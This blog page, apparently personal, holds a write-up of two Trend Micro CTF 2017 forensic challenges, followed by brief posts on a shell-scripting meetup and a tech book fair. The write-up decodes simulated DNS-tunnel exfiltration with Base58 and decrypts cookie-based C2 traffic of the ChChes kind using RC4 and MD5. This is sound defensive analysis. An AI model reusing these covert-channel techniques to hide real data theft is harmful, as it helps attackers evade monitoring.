ニュース

Trend Micro CTF 2017 Writeup

kanataほぼ7年前に追加

CTF Writeup TMCTF2017

結果&感想

Trend Micro CTF 2017 に、某チームで参加しました。
今年は善戦しましたよ!(国内10位以内)。二問解けました。
解けたけど、途中までチームの方が解いてくれたやつのオイシイ所だけ持っていった感じだったりします。

という訳で、解ってる部分のwriteupです。

Trend Micro CTF 2017 オンライン予選 ランキングページ
https://ctf.trendmicro.com/ranking.html

Forensic 100

pcapのファイルが渡されます。
早速Wiresharkで読んでみるとこんな感じ。

20170625_tmctf_forensic100.jpg

DNS通信の羅列です。なんかメチャクチャなホスト名のAレコードを引っ張ってこようとしているように見えます。

Malwareの通信を模している

どうやら、以下のマルウェアを模した通信のようです(チームの方が調査して教えてくれました)

遠隔操作ウイルスの制御にDNSプロトコルを使用する事案への注意喚起
https://www.lac.co.jp/lacwatch/alert/20160201_000310.html

遠隔操作ウイルスの制御にDNSプロトコルを使用する事案への注意喚起 | LAC WATCH | 株式会社ラック

「遠隔操作ウイルスの制御にDNSプロトコルを使用する事案への注意喚起」のページです。ラックは、セキュリティ対策とシステム開発より培った技術と経験より、ITを活用する企業に対して技術情報の共有や、情報セキュリティやIT活用に対する提言などの有用な情報発信をします。

余談ですが、一般的な企業の外部との通信環境として、DNSのログまで取らなかったり、DNS通信のためにファイアウォールのポートを開けてたりするので、通信の偽装方法としてはかなり賢いやり方かと思います。

そして、そのチームの方が、そのメチャクチャなホスト名を抜き出してくれます。

ASfsbGivEQsT2aQPHzaB
5GBJZEAWX7WJASGCg5Br
9TvJjPCj9kRW9fk5XU2b
rvAptS4tZnjLwCNsXn5N
9jUqipSo5xgNR6EM3Zpw
8kdhrsqDd3Gb5wSSPqKN
8wkw5kPRgi5ihJnGYxid
p7vfcECXgiGtisBnZiD9
C2kv3MzxMXGZiSgQpfmt
y3vYWgxkk9ygyqJcRDnD
PB2gk8K9SJFcKrPimJja
9REhmzgECtjmEMYVz5QY
tsHgSBzRBT8FbQx3mvpX
jEkoi86dM8n9eQuZ38wj
8Jvg2HSvjr8qyEtur3E5
vPfFiANqqbY4J4jbCyNr
UrJLW8fGVvr9mdAyAqpJ
sk8h9X8t1LtyXV2cMoxa
j2ELd8EoY3aGDatsba5m
VkNwpptkVumdo8sxXoYS
ta6fKKAC3MXfLVvkHYSs
Gs9fnyXPMgitffJ49xt4
oCxCHtyoWgytH6sudYPk
SypJUuCWfsS1R771e95R
eRvie3RgQjEwpVL4HsnC
EJeEEzPWVtJQpTcheGGB
sMzqMuR3y8eui2wU93H5
ZeDVauv4qQYPWdpub8Ys
J9X3mQCZ7B4XsdyTUSyT
goeboTbqpATAnuCDRzYn
pd6sQ5PggQBdoUYjABcP
HgUp34UmzHSGaRScoHzF
T8W51c8iY3X6uNCxRwnZ
LCx2C4PBwZN24wKWFAoL
vSTGaeVcxBQ3UHo9xpY5
HoHJaL1pPaxAhFhei73H
5k5doyAoKhvTdvNehEhJ
ocCoxRZKbBQP8f7cZgTm
CuD1ekRNQ6o7ZysnuDwf
vvmotn9Wap7DeGZGnS94
g7wUSB4B7VUcSEcT9G18
yYuKh8fjBAw9fJrrgZmZ
97FnKJWgXf9Ju9648DDB
gh534XrjqMLiBXFq2dnf
qmG845ndTuXSR1bMRpqp
jFeJN52D9KKKaYqTgoCq
o9Y1nt9pwahd3v1srMpj
VTPt46SH2RKU21ZfiqEN
of8hkgxxLTLtkWPRPJeB
9WSVGzALTZ3L8QVsq1uX
HwUKYkmjbX71Phrzfnhz
V5ffFCtjiuF1D4gtMY1c
f9ieUzKWF7voscgM2zcV
oiDdYCfpKJGrkzpDZB1c
QTPDZYyLbzZ9hE2B1RAw
V7e4NGuG8TPQmaXvet3r
Ze3Q7zZhmcdXhwbd8Et7
JZHcvidkLCb1JDrNe1dX
6fjddFonVfoMWNcAHLH5
BypDgNtAwK2JkABnkMAs
BQi16XaNToXzTC4Ug8UN
gyUfRjXrwzTYckVfE7Vo
e5kdwYLX4FQ12eQm3BbW
76tkfsZUUAm3gHHk3roT
CiQ8kNejjitLaRVhfeuG
yfMkotR8TVmYPGqEmcS1
qRMWJmigBwg7ZbG4hSDC
dSq83eKsFyig8A4EDsPF
XnGKAgUe1UYHvzahFBhn
eyhgmfdbheRAEAkMqVn5
PBmEhv7bC4aNUZ465Hus
2JpJF5L4tkfbJsAVmCrt
REhCuLhUqXqVmFBqknho
x2BfRQqAZMB6f4udU3Xo
U4qED1V5kEqA1qVGytjW
B2pQGbjuacAjf2C8n7QS
UTJhFsrmQp12sUE7WJ6w
tTg4bnjNDzyHbJSiVWhr
2EuES8qZbVFP5478HpVh
8dpCvz6DJJybAEfcsg76
pGLBatEMvjiHTC5LhdAf
PbQiePVedCjEQL21Pn6i
GLTPZfWqHVz3ZtkR4iDF
Zyn3L5ZGWjCJ3JgzCTRm
YeuXfW2XcNMipgv4c97i
8TAbL3m5rhV5ShtjBAqw
dfszh1erSpVDMuijNpo2
sC6czF2fq6mGMKe8hwWo
BwVt7sRaAYtp94AEw5AJ
HUdvfRzsQ7XBMQBMDHbp
mCkWortnVk1krAVUK8Mf
GQezUgvSmX6pBgXDrGkx
yNmWpQg8DeF5saQApGKM
zshqTmGrrJm7s4TYajBs
RKatfjKBLgto6YHd548A
LADReAEmymFbDg31U6dJ
Pp1XbHujeMe3z2QQqmft
Az2LRpfjz6Rh64cVRK6D
adBBsL9quZoiZB339vLD
Mx4xRRaU7N5NxSnPz4Zj
uYm4V2uUoTmA4jaS7atS
zbEBujiVf2wTz18ymbPF
apXrc53WNL9iYa7nqHUA
gvn1Bx9L5hadd5A97ss2
NhSPmwZGBu7rj2f43uwf
dGamzZpGxEascuGT48p9
wgm49Ck6QovrCj7g3KAZ
XEopDkmeReSRNkEipH2U
4V7Vim425LAJsghg1nqX
DRHx4QNAe9TKBiRYPw2w
PdPi9gWHPpnwHJyX896E
rCvXadRfQrEuushKthcn
vUyUXt8MZWcHLujDkKFq
hama3vxFTDH7N8QD5Kch
Nevv7KPDo95DagyyZHGy
LT7DKEusvJ8SZuodBEeW
wwJ1qfCMasEBBiPXov6h
UexhazHeJRTEVscjZ2bN
iScQs2YuqPnej26QShcr
wwyunJZu2S9yqo7i6Psf
pWXAmZcQ7Nba7QpAfaH4
NuGnhzUb9KcVZmJkfRzg
D3egFR9C79gQYybVMpd6
Kxz5xRzS4WAhLLdqwUFx
NBw3hUV7nMywSR6Cg2aj
nv61ZWVNgAofwXuthzfG
kAyae51WNWjtbtpCSEQL
PY1uTwWZ13bthQaoCeZ5
3nomwgWB4EBaimmu78qn
AquqjeCw73XK4UXGR61T
HLxgSiuGjRRcj6489cuW
fQ7gyU6ckPo6QL8cGPvH
j6CXJ4w8CakQMmwq7JGp
PToD826chKGtH5A2RKCk
Hc7NQA79MvHvXdtByDC4
iPaivSRmLXZa5W8vr4F7
JqbK8ghZcQJuSGWTaQwQ
jjABhkmWvDvs6HHyW3j8
XK6cPijnTVvCgDN63Nrm
suNkMCnbkiWRZfgu8pqc
kVze5LxGnVWPmtmnVv4u
nssrKhd1SBPU17vps76M
iHontgDCbfxtp9BZFt8E
YtZMUghzzxQxTKFGGg9b
L6eRrrFfjYx15E4GtAmZ
5wZA5oxE8atxtdaWc1qf
Q7wMMvzR8QHx5Xw7imGX
h4M58Kiknsw7urRDkitH
2EAxKPLsbp4eAERFFNT3
Vy6XdymAGGkok1KcM5EW
WSpdEjWJpdi36dYsXCTr
bLYqXuMFHViL5GP9HFJh
Mez6hsvcsscaLUUz3KhW
D9owzzczVAk8GzDkkrT1
Sqxs6oG3Q6isAHUAVYUb
iRaqm3AjSazJf5BsA6Xx
xc9LV25nKvTKjK6Q4UEX
WvMnEM5iKTmwWsoHvGB4
EnNNN34f9mfavgdTfG9W
ovwysP4AxHK4iHipuv5m
to1ugHG2vFgVafweSaFh
63qhYqEc9HHmJaFRJ8bS
JBLBEi9LKmsDCufc6u6F
QCshYApRFKKGYWEgMaWA
BHSLEfwA8KrZyF2Whbyu
NiskF6RWVJMpBX2g7oqU
j3W73H4E5ybHUqQx5HeK
pPgDFSxRMtVCee8U5KmU
XDPDFHEY9ayoDGE3P6UM
Mu6u4GPwMxoT8r2hKrZi
gMvngG5ujwKm5FCX1DQN
PAdzTtQPMuVfNSq5YL8n
jRpT1UFDWFV6PQ616hX3
92iTiMQbNN41VgKE1Zp5
4qG3nYK6DJCG1yssE71H
xYudvTV2vRdx4kLQvMLc
7UPfCfjswRxptxyffRcM
NV4fpnSXHKVKVNo7rnmb
ZjyAgQmNiA4tG2yaVLqK
Q6mdzH914mH7inV9keb4
evbazKxFhumbhtKr4YAm
7VqUxTiwGrqcsdg9XwHu
wZG69BmoRkhJhVFRkxe2
qSQGrk6qGMP4MPKYZXzC
JEU14sq3rGEU23avuKUj
CPcEVcMboGvjH6N7TG8z
gQmnhrXaDQVqQ6dBiGwg
3eESUiXFQxZLZFecXiu1
gHG7p75QCedSV5EEwdpy
EL1rJWTji8WvAKDGpkqX
KDxJPQW78DmTtdVDNWgE
VqkBRKp4HiYcSV3WZ71v
pm6LzkEW7UyoQnF3AfcV
uFp4ogxeA9vPzZ3LoVFS
ts9CYgPxJW8i2KpUW1bP
itDsYqqr6tK3wvLW3CWd
zWrDWowzgSoFHZQ6EqiL
pfVbfuvj5FyURHsmDecG
FnnAdBFckx6hJeuagNNb
K4iyT9KfPDUPoGXprsGc
peVY9SRU3nMVjuFB22zi
qZxPwASjebDepePoe3Lb
TDwK8XFTx8JaKr5xXyGk
w7cqBCzvhVWQvkRjyWhF
YmfRc3S2814fatrghk9C
phAcHkLfNhvU9yUmsDmw
WpUXQH9ZnxUPRDVN3oEJ
hvG5ptZF9YJtSQdKATni
f7Ut2tis18xaKdiARRi2
cQiD1GTtd7NFtq9TxNmL
7C2vQNGneNpGJPWb9mZM
G3g4CCHaunsKyXExXL9y
EjBwHq6H9unt9wAiCGVH
32mvVRZbLMF4CpWRiqW8
nVqCx4PpCdopakRUqZfX
2iEJ4UKtU4CEYUMH23sB
2XSeveHgoNtTZvaziunD
XHMHSTJe3VKYRy4JQSs3
W3xe3apFCkwS33mea2gf
giqwhGTifa2QAjgGsdae
1RejMC5dqWjAMfXMmC6m
A3b5DEDZAP5XgJqi6vZM
Sho8CNWQAZ1xD2RKGyCr
8gCx1zsfpuL5ffFmzC7K
rzZ9ZxoWRHrnWmS9E5rs
gtGRn5kMtVe8jnYXZeoV
xYt7uvFeLjXRfmaDXt7S
mD5pz9nNwXTqZ1WhUN74
3CFUCeMD2ZFpT68gme2T
iT17Fhwuh1EQekVwxDrQ
sTD2tRh3PHRatw49h9vi
4FUyNnh3BJwuq9UykbJ7
kq9faJQxuJiwxWRUBD9T
K9G9dBn1AhcDwogPyqU3
rFneZ37FL56NvaPXgVLX
7d2wY7JbrzuY3SHhjECW
yFWGBSpGurNmCUFf4a9b
LvH8xnKXyPpLjNyBcsPT
aXET3299mhHaXKTpBApD
bukmRnpMkwqUJyQAvhxq
iDRkrZTfKYws43sfzfab
xEEWL6uaSZLTjze8avxq
tDemvaPgjfMcfvqvjz66
UAnraPLbymzo9PL5imY2
6LPinAGSJi6q3oSPAvYg
boMWbDWrNbsS56v64KBa
iLS28qQWdL5t3ADvL5eC
R1EDEDzx74zYL3WVNcJe
nBQFprxj7U4hzDm22edM
xLpR5daeYKmKtTcjEanU
Lv6obrrXW5JWbEoKn4qG
patrf76fKwKMZnvwxUhz
3iSLkfZQLgQoJHWvzVCR
E7e7GmJwgLPri45ctU4W
NuN72W8UyWzGTK

ぱっと見、Base64っぽいので、デコードしてみますが、なんかよく解らないバイナリの値になりました。
よく見るとBase64で使われるはずの +/ が見当たりません。なんの文字が使われているかちょっと確認してみましょう。
シェル芸が光ります。

$ cat file5_dns.txt|grep -o .|sort|uniq|xargs|tr -d ' '
123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz

Base ? encoding

数字・英大文字・英小文字・記号は無し
という事が解ります。

Base64ではなくて、他のエンコーディング形式かもしれません。
予め、以下にまとめてあるので確認してみます。

raintrees.net - CTF Crypto - Base N encoding
https://raintrees.net/projects/a-painter-and-a-black-cat/wiki/CTF_Crypto#Base-N-encoding

以下、抜粋

方式 使用される文字 参考
Base58 123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz Bitcoinに利用
Base62 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 JavaScriptの難読化等

この特徴に合致しそうなのが、Base58とBase62であることが解ります。なんというマニアックなエンコード方式w

使われている文字をもう一度確認してみましょう。

123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz

数字 0 英大文字 I O 英小文字 l が見当たりませんね。実はこれ、Base58の特徴と合致します。

Base58は、Bitcoinに利用されているエンコーディング方式で、数字として間違えやすい0OやIlを意図的に除外しているそうです(知らんけど)

Base58によるdecode

そんな訳でBase58でデコードしてみます。
ググると以下が使えそうなことが解りました。

https://asecuritysite.com/encryption/base58

後は、やるだけ。以下、ソルバ。

import sys

val='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'

from hashlib import sha256

# 58 character alphabet used
alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'


if bytes == str:  # python2
    iseq = lambda s: map(ord, s)
    bseq = lambda s: ''.join(map(chr, s))
    buffer = lambda s: s

def b58encode(v):

    origlen = len(v)
    v = v.lstrip(b'\0')
    newlen = len(v)

    p, acc = 1, 0
    for c in iseq(v[::-1]):
        acc += p * c
        p = p << 8

    result = ''
    while acc > 0:
        acc, mod = divmod(acc, 58)
        result += alphabet[mod]

    return (result + alphabet[0] * (origlen - newlen))[::-1]


def b58decode(v):

    if not isinstance(v, str):
        v = v.decode('ascii')

    origlen = len(v)
    v = v.lstrip(alphabet[0])
    newlen = len(v)

    p, acc = 1, 0
    for c in v[::-1]:
        acc += p * alphabet.index(c)
        p *= 58

    result = []
    while acc > 0:
        acc, mod = divmod(acc, 256)
        result.append(mod)

    return (bseq(result) + b'\0' * (origlen - newlen))[::-1]

print 'Input:\t',val
print 'Base58:\t',b58decode(val)

で、以下がフラグ

出力結果、中略
     ・
     ・
     ・
TMCTF{DNSTunnelExfil}

Analysis-Defensive 200

なんかzipファイルを渡され、中身はdataというバイナリファイルと、q.jpgというテキストファイルが入っています。

q.jpg(中身はrubyのソースコードかな?)

function rc4 {
    please implement it yourself.
}

function md5($txt){
    please implement it yourself.
}

function invoke-Encryption{
    $FileName = "ZGF0YQ=="
    $FileBase64Data = ????????
    [Byte[]] $FileBinByte = [Byte[]][Convert]::FromBase64String($FileBase64Data)
    [Byte[]] $FileNameByte = [Byte[]][Convert]::FromBase64String($FileName)
    $enc = [System.Text.Encoding]::ASCII
    $key = "Y2hjaGVz"
    $key1 = [System.Convert]::FromBase64String($key)
    $key1 = [System.Text.Encoding]::UTF8.GetString($key1)
    $key1 = md5($key1)
    $key1 = $key1.Substring(8,16)
    [Byte[]]$key1 = $enc.GetBytes($key1)
    [Byte[]]$key2 = [Byte[]][Convert]::FromBase64String($key)
    $FileBinByte = $key2 + $FileBinByte
    $FileBinByte = rc4 $FileBinByte $key1
    $tempFile=[System.Text.Encoding]::Default.GetString($FileNameByte);
    if($tempFile.Length -ne 0){
        if($FileBinByte.Length -ne 0){
            if(Test-Path "$tempFile"){rm "$tempFile"}
            $fs=New-Object System.IO.FileStream($tempFile,[System.IO.FileMode]::CreateNew)
            $fs.Write($FileBinByte,0,$FileBinByte.Length)
            $fs.Close()
        }

    }
}
invoke-Encryption

実装してねという事かと思いますが、チームメイトのcatさんがやってくれました。
ほんと天才やでぇ。

で、中身はpcapファイルでした。

20170625_tmctf_analysis-defensive200.jpg

怪しげなcookieの値があるのが解ります。

asdf=d01J5ln6eJxopAgX2SgmLRYGt5X70XRw4HL6sFoDbvWD5yQ%3D;
qwer=fJDeRjsja7z8wcPVLrZzm6jYl3UsvQC9AoduZgL24n1NYs8%3D;
zxcv=%2Fvox%2Bi3on9Iy1U%2B2itypfjagJ06762d9yfkxI%2FLgSq3a2PJXwdnQ8BhDI9ofW9HXXSQMaEXBkYdrun%2BF%2BxIi3a%2B3TvHY

cookieの値で通信内容を偽装するMalware

なんでしょうねコレ・・・。ふと、マルウェアの通信で使ってるんじゃないかと気づき(だって、DNSで偽装通信してるくらいだしね)
ちょっと調べてみました。

ありました。

Cookieヘッダーを用いてC&CサーバとやりとりするマルウエアChChes(2017-01-26)
https://www.jpcert.or.jp/magazine/acreport-ChChes.html

Cookieヘッダーを用いてC&CサーバとやりとりするマルウエアChChes(2017-01-26)

Cookieヘッダーを用いてC&CサーバとやりとりするマルウエアChChes(2017-01-26)

ちなみに、問題文には、 xiangqi とだけ書いてありました。xiangqi は「中国の将棋」の意味らしいです。ChChesと合致しますね。

なんか、このページには、この怪しげなクッキーから通信内容を復号化するソースコードまで書かれています。

ソルバ

後は・・・やるだけ!ではないです。URLエンコーディングされている箇所があるので、そこだけ置換します。

%3D → =
%2F → /
%2B → +
from Crypto.Cipher import ARC4
import hashlib

cookie_data="asdf=d01J5ln6eJxopAgX2SgmLRYGt5X70XRw4HL6sFoDbvWD5yQ=;qwer=fJDeRjsja7z8wcPVLrZzm6jYl3UsvQC9AoduZgL24n1NYs8=;zxcv=/vox+i3on9Iy1U+2itypfjagJ06762d9yfkxI/LgSq3a2PJXwdnQ8BhDI9ofW9HXXSQMaEXBkYdrun+F+xIi3a+3TvHY"
data_list = cookie_data.split(';')
dec = []
for i in range(len(data_list)):
    tmp = data_list[i]
    pos = tmp.find("=")
    key = tmp[0:pos]
    val = tmp[pos:]
    md5 = hashlib.md5()
    md5.update(key)
    rc4key = md5.hexdigest()[8:24]
    rc4 = ARC4.new(rc4key)
    dec.append(rc4.decrypt(val.decode("base64"))[len(key):])
print("[*] decoded: " + "".join(dec))

実行結果

[*] decoded: AWIN7-PC*1234*TMCTF{e3526984696bc9f89ac88d4f72abe24}?361846839?C:\Users\win7\AppData\Local\Temp?1.7.3 (1024x768)*6.1.7601.17514

第28回基準値を超えるシェル芸勉強会に参加させて頂きました!

kanataほぼ7年前に追加

シェルスクリプト大好きなんですが、毎回新しい知見が得られて、やっぱり面白いですね!
今回は難しかった。。


【問題と解答】第28回基準値を超えるシェル芸勉強会


最近は毎回Twitterのトレンド入りしてる

第28回基準値を超えるシェル芸勉強会

Youtube

第28回シェル芸勉強会(午前の部)
https://www.youtube.com/watch?v=TPzFICWp-sA

第28回シェル芸勉強会(午後の部)
https://www.youtube.com/watch?v=oDolLjPUAx4

第28回シェル芸勉強会(長いLT大会)
https://www.youtube.com/watch?v=uRElj5X0S7k

今回はLTやりました

スライドをどうぞ~

https://www.slideshare.net/kanata1/ss-75315943

内容は以下の話をまとめたものです。

難読化シェル芸

その他、知見メモ

  • LaTexの文字列編集は地獄(awkとsedでがんばってなんとかする)
  • Javascriptでもヒルベルト曲線が書ける
  • C#でもシェル芸ができる

技術書典2に行ってキマシタワー

kanataほぼ7年前に追加

技術書典2に行ってきました。

技術書典2:技術書オンリーイベント

僕らが作る。 技術書オンリーイベント第2回開催決定! 2017年4月9日(日) 秋葉原 アキバ・スクエア

技術書の同人誌販売な感じのイベント。去年に引き続いての2回目。規模が大きくなりました。

コミケは行ったことがないのだけれど、技術書典だけは去年に引き続いて2回目。早めに行ったから早めに入れたんだけど、めっちゃ並んでた。
でも、早めにいって並んでた方がいいよ!変える時、その列が3倍の長さになっているのを見た。

去年と比べ、ソフト関係よりハード関係が増えている印象。ロボット、IOT、ラズパイ、ROS…どれも面白そうだわ。。

20170409_techbookfest2_1.jpg

買った時点でなんか満足感を得たんだけど、ここから読むのがまた面白いんだよね。
ちょこちょこ読ませて頂きます!

以下を買いました。読むのが楽しみ。

でざぱたん

でざぱたん公式Webページ

新ジャンル!? ...

デザインパターンの本。GoFとか、あんまり理解していないやつがあって、もやもやしてたので、勉強する良い機会。

脆弱性

技術書典2:きじゃくせい 詳細

コミケで頒布したコンピュータセキュリティに関するコラムと新刊(ハニーポットとdockerの本)の予定です

セキュリティ大好き人間としては買わずにはいられない

Lantern - 新感覚マルウェア解析ミステリー

技術書典2:Lantern 詳細

マルウェア解析ミステリー (PE/x86)

